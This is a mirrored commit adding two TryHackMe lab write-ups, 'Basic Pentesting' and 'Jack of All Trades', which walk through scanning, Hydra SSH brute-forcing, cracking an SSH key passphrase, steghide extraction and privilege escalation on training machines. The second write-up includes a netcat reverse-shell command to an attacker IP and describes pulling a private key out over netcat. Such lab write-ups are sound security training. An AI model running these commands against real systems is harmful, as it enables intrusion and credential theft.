Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-10 06:34:17 +00:00
Code Issues Projects Releases Packages Wiki Activity

Add files via upload

Browse source
This commit is contained in:
AbdullahRizwan101 2020-11-01 23:33:29 +05:00 committed by GitHub
parent 9327a54920
commit f1b98508e2
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
2 changed files with 476 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

268
TryHackMe/Basic_pentesting.md Normal file
View file

@ -0,0 +1,268 @@
# TryHackMe-Basic Pentesting
>Abdullah Rizwan | 07:04 PM | 1st November , 2020
## NMAP
```
Nmap scan report for 10.10.207.136
Host is up (0.17s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13?
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http-proxy
| fingerprint-strings:
| ms-sql-s, oracle-tns:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 2243
| Date: Sun, 01 Nov 2020 14:11:05 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
|_ Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font
ily:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-c
olor:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;
color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name
{color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/
submit.cgi?new-service :
SF-Port8080-TCP:V=7.80%I=7%D=11/1%Time=5F9EC1F9%P=x86_64-pc-linux-gnu%r(or
SF:acle-tns,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charse
SF:t=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\
SF:x20Sun,\x2001\x20Nov\x202020\x2014:11:05\x20GMT\r\nConnection:\x20close
SF:\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Sta
SF:tus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"te
SF:xt/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;backgro
SF:und-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,s
SF:ans-serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x
SF:20{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#52
SF:5D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;c
SF:olor:black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,s
SF:ans-serif;color:white;background-color:#525D76;}\x20p\x20{font-family:T
SF:ahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}\x2
SF:0a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:
SF:1px;background-color:#525D76;border:none;}</style></head><bod")%r(ms-sq
SF:l-s,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=utf
SF:-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\x20Su
SF:n,\x2001\x20Nov\x202020\x2014:11:05\x20GMT\r\nConnection:\x20close\r\n\
SF:r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\x
SF:20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"text/cs
SF:s\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;background-c
SF:olor:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-s
SF:erif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x20{fo
:0{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:1px;b
SF:ackground-color:#525D76;border:none;}</style></head><bod");
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2020-11-01T09:11:08-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-01T14:11:08
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.02 seconds
```
## PORT 80
<img src="https://imgur.com/OLJ7xaK.png"/>
## PORT 8080
<img src="https://imgur.com/3V494fv.png"/>
## Smb Shares
Port 139 and 445 are open see lets see if we can access the samba shares
<img src="https://imgur.com/IT3LDqi.png"/>
<img src="https://imgur.com/EOVK7av.png"/>
From the `staff.txt` that we just grabbed , we can find two usernames `jan` and `kay`.
```
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
```
## Gobuster
Running gobuster we can find a directory `/development`
```
gobuster dir -u http://10.10.207.136/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.207.136/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/11/01 19:18:49 Starting gobuster
===============================================================
/development (Status: 301)
Progress: 3698 / 220561 (1.68%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/11/01 19:20:02 Finished
===============================================================
```
<img src="https://imgur.com/Q0ItoLg.png"/>
`j.txt`
```
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
```
`dev.txt`
```
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
```
## Hydra
Now jan is the username we found and it has a weak password so lets bruteforce it using hydra and we know that there is ssh runnin on the box so,
```
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.207.136
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-01 19:27:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.207.136:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344223 to do in 1358:22h, 16 active
t[STATUS] 112.00 tries/min, 336 tries in 00:03h, 14344063 to do in 2134:32h, 16 active
tt
[22][ssh] host: 10.10.207.136 login: jan password: armando
```
<img src="https://imgur.com/FLDBsrg.png"/>
Visti kay's home directory and there you can read `.ssh/id_rsa` private key for logging into ssh , send and receive it through netcat
<img src="https://imgur.com/WDpCcKJ.png"/>
But we still cannot login because that `id_rsa` is password protected
<img src="https://imgur.com/1KZChBk.png"/>
Use `ssh2john` to get hash of `id_rsa` file
```
root@kali:~/TryHackMe/Easy/BasicPentesting# /usr/share/john/ssh2john.py id_rsa > hash_for_id_rsa
```
Now run `john hash_for_id_rsa`
```
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
0g 0:00:00:56 3/3 0g/s 2748Kp/s 2748Kc/s 2748KC/s pigr3sr..pigr0ts
0g 0:00:00:57 3/3 0g/s 2760Kp/s 2760Kc/s 2760KC/s jalyoun..jalyof4
0g 0:00:00:58 3/3 0g/s 2772Kp/s 2772Kc/s 2772KC/s 1llgod..1llgu1
0g 0:00:05:23 3/3 0g/s 2294Kp/s 2294Kc/s 2294KC/s fcp0luf..fcp0l46
0g 0:00:05:24 3/3 0g/s 2297Kp/s 2297Kc/s 2297KC/s nadah76..nadahro
0g 0:00:06:36 3/3 0g/s 2351Kp/s 2351Kc/s 2351KC/s gaudlsd..gaudsk3
0g 0:00:07:21 3/3 0g/s 2381Kp/s 2381Kc/s 2381KC/s civlup42..civl12mt
0g 0:00:07:22 3/3 0g/s 2384Kp/s 2384Kc/s 2384KC/s adiskak2..adiskuas
0g 0:00:09:14 3/3 0g/s 2527Kp/s 2527Kc/s 2527KC/s cornsexice..cornsexto1
0g 0:00:09:15 3/3 0g/s 2528Kp/s 2528Kc/s 2528KC/s cujkdc1..cujkdd4
0g 0:00:09:16 3/3 0g/s 2530Kp/s 2530Kc/s 2530KC/s bslhmf6..bslhm82
0g 0:00:09:17 3/3 0g/s 2532Kp/s 2532Kc/s 2532KC/s psyctiu..psyct29
0g 0:00:09:18 3/3 0g/s 2534Kp/s 2534Kc/s 2534KC/s tr00ge1..tr00gak
0g 0:00:09:19 3/3 0g/s 2536Kp/s 2536Kc/s 2536KC/s kmdufs1..kmduf6q
0g 0:00:12:52 3/3 0g/s 2458Kp/s 2458Kc/s 2458KC/s ecicos7..ecicots
0g 0:00:12:53 3/3 0g/s 2460Kp/s 2460Kc/s 2460KC/s eussce7..eussc14
0g 0:00:12:54 3/3 0g/s 2461Kp/s 2461Kc/s 2461KC/s exxza8f..exxzay!
0g 0:00:12:55 3/3 0g/s 2463Kp/s 2463Kc/s 2463KC/s eevzco5..eevzcuk
0g 0:00:12:56 3/3 0g/s 2464Kp/s 2464Kc/s 2464KC/s ublhl..ublni
0g 0:00:12:57 3/3 0g/s 2466Kp/s 2466Kc/s 2466KC/s 0zjnhb..0zjnd4
0g 0:00:12:58 3/3 0g/s 2467Kp/s 2467Kc/s 2467KC/s l4zb3n..l4zpay
0g 0:00:12:59 3/3 0g/s 2469Kp/s 2469Kc/s 2469KC/s hfu71s..hfu706
0g 0:00:13:01 3/3 0g/s 2471Kp/s 2471Kc/s 2471KC/s 4s18le..4s18cw
0g 0:00:13:02 3/3 0g/s 2473Kp/s 2473Kc/s 2473KC/s mcjau03..mcjau25
0g 0:00:13:03 3/3 0g/s 2474Kp/s 2474Kc/s 2474KC/s cim0cno..cim0c11
beeswax (id_rsa)
```
<img src="https://imgur.com/z0d6Xi2.png"/>
Now to become root we can run ALL commands
```
Matching Defaults entries for kay on basic2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User kay may run the following commands on basic2:
(ALL : ALL) ALL
kay@basic2:~$
```
so `sudo bash`
<img src="https://imgur.com/SYNGX9N.png"/>

208
TryHackMe/Jack_of_All_Trades.md Normal file
View file

@ -0,0 +1,208 @@
# TryHackMe-Jack Of All Trades
>Abdullah Rizwan | 08:17 PM , 1st November 2020
## NMAP
```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-01 20:18 PKT
Nmap scan report for 10.10.103.231
Host is up (0.18s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Jack-of-all-trades!
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA)
| 2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA)
| 256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA)
|_ 256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.76 seconds
```
## PORT 22
Noramlly this is default port 22 but in this case it is http if you visit it on firefox it has restricted default ports like ssh , ftp and etc so inorder to enable we have to go to browser's `about:config` and a property to override theses settings
https://support.mozilla.org/en-US/questions/1083282
<img src="https://imgur.com/rzMq2ks.png"/>
<img src="https://imgur.com/s6O5rAh.png"/>
And we can access the page now
<img src="https://imgur.com/LdntB1r.png"/>
By looking at the source code
<img src="https://imgur.com/xb0DMC4.png"/>
We can find two things `/recovery.php` and a base64 encoded text
On decoding the text
```
Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! Also gotta remember your password: u?WtKSraq
```
user name john maybe
Download those images
<img src="https://imgur.com/B8Yflc3.png"/>
<img src="https://imgur.com/mFfLM5F.png"/>
By looking at the source code and login with `Jack` and `u?WtKSraq`
```
GQ2TOMRXME3TEN3BGZTDOMRWGUZDANRXG42TMZJWG4ZDANRXG42TOMRSGA3TANRVG4ZDOMJXGI3DCNRXG43DMZJXHE3DMMRQGY3TMMRSGA3DONZVG4ZDEMBWGU3TENZQGYZDMOJXGI3DKNTDGIYDOOJWGI3TINZWGYYTEMBWMU3DKNZSGIYDONJXGY3TCNZRG4ZDMMJSGA3DENRRGIYDMNZXGU3TEMRQG42TMMRXME3TENRTGZSTONBXGIZDCMRQGU3DEMBXHA3DCNRSGZQTEMBXGU3DENTBGIYDOMZWGI3DKNZUG4ZDMNZXGM3DQNZZGIYDMYZWGI3DQMRQGZSTMNJXGIZGGMRQGY3DMMRSGA3TKNZSGY2TOMRSG43DMMRQGZSTEMBXGU3TMNRRGY3TGYJSGA3GMNZWGY3TEZJXHE3GGMTGGMZDINZWHE2GGNBUGMZDINQ=
```
This is base32 encoded text on decoding it
<img src="https://imgur.com/PNwkLcw.png"/>
```
45727a727a6f72652067756e67206775722070657271726167766e79662067622067757220657270626972656c207962747661206e657220757671717261206261206775722075627a72636e7472212056207861626a2075626a20736265747267736879206c6268206e65722c20666220757265722766206e20757661673a206f76672e796c2f3247694c443246
```
Now this is hex text on decoding it
<img src="https://imgur.com/hInfNdO.png"/>
```
Erzrzore gung gur perqragvnyf gb gur erpbirel ybtva ner uvqqra ba gur ubzrcntr! V xabj ubj sbetrgshy lbh ner, fb urer'f n uvag: ovg.yl/2GiLD2F
```
This is ROT 13 (Shift Cipher)
<img src="https://imgur.com/WmKeBxZ.png"/>
```
Remember that the credentials to the recovery login are hidden on the homepage! I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S
```
On visiting the link
<img src="https://imgur.com/WPPtesd.png"/>
Now its says about `Stegosauria` , now we recently downloaded two images on our machines ,so that dinosaur one looks interesting on using `steg hide --extract -sf [image.jpg]`
<img src="https://imgur.com/D8Dp9o2.png"/>
<img src="https://imgur.com/HL9DDof.png"/>
So this a rabbithole , lets steghide on different image , the second `jackinthebox.jpg` also didn't worked but when grabbed the `header.jpg` it worked
<img src="https://imgur.com/SNAzsSc.png"/>
```
Username: jackinthebox
Password: TplFxiSHjY
```
However this is not the credentials for SSH
<img src="https://imgur.com/vYObw7r.png"/>
Now this is a RCE execution we can run a reverse shell here
```
nc -e /bin/sh 10.14.3.143 4444
```
You can run any reverse shell you want but `netcat` one worked so lets roll with it
<img src="https://imgur.com/bXY0z0b.png"/>
Now we are `www-data` can't run really do much so lets try to elevate our privileges,so lets enumerate the machine , upload `linepeas`
<img src="https://imgur.com/1bwVyii.png"/>
Linpeas didn't find anyhting useful so there is a file in `~` home directory `jacks_password_list`
<img src="https://imgur.com/j95luIi.png"/>
## Hydra
Now we need to specify the port number becasue it's not on port 22
```
hydra -s 80 -l jack -P password_list.txt ssh://10.10.103.231 -V
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-01 21:49:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:1/p:24), ~2 tries per task
[DATA] attacking ssh://10.10.103.231:80/
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "*hclqAzj+2GC+=0K" - 1 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "eN<A@n^zI?FE$I5," - 2 of 24 [child 1] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "X<(@zo2XrEN)#MGC" - 3 of 24 [child 2] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass ",,aE1K,nW3Os,afb" - 4 of 24 [child 3] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "ITMJpGGIqg1jn?>@" - 5 of 24 [child 4] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "0HguX{,fgXPE;8yF" - 6 of 24 [child 5] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "sjRUb4*@pz<*ZITu" - 7 of 24 [child 6] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "[8V7o^gl(Gjt5[WB" - 8 of 24 [child 7] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "yTq0jI$d}Ka<T}PD" - 9 of 24 [child 8] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "Sc.[[2pL<>e)vC4}" - 10 of 24 [child 9] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "9;}#q*,A4wd{<X.T" - 11 of 24 [child 10] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "M41nrFt#PcV=(3%p" - 12 of 24 [child 11] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "GZx.t)H$&awU;SO<" - 13 of 24 [child 12] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass ".MVettz]a;&Z;cAC" - 14 of 24 [child 13] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "2fh%i9Pr5YiYIf51" - 15 of 24 [child 14] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "TDF@mdEd3ZQ(]hBO" - 16 of 24 [child 15] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "v]XBmwAk8vk5t3EF" - 17 of 25 [child 13] (0/1)
[80][ssh] host: 10.10.103.231 login: jack password: ITMJpGGIqg1jn?>@
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-01 21:49:54
```
<img src="https://imgur.com/aT4gtfl.png"/>
Using netcat to get that image on our local machine
<img src="https://imgur.com/DgS4vMh.png"/>
<img src="https://imgur.com/agCAuvB.png"/>
This is our user flag
Check for SUID
```
jack@jack-of-all-trades:~$ find / -perm /4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/bin/chsh
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/strings
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/procmail
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
jack@jack-of-all-trades:~$
```
<img src="https://imgur.com/xWUCjwT.png"/>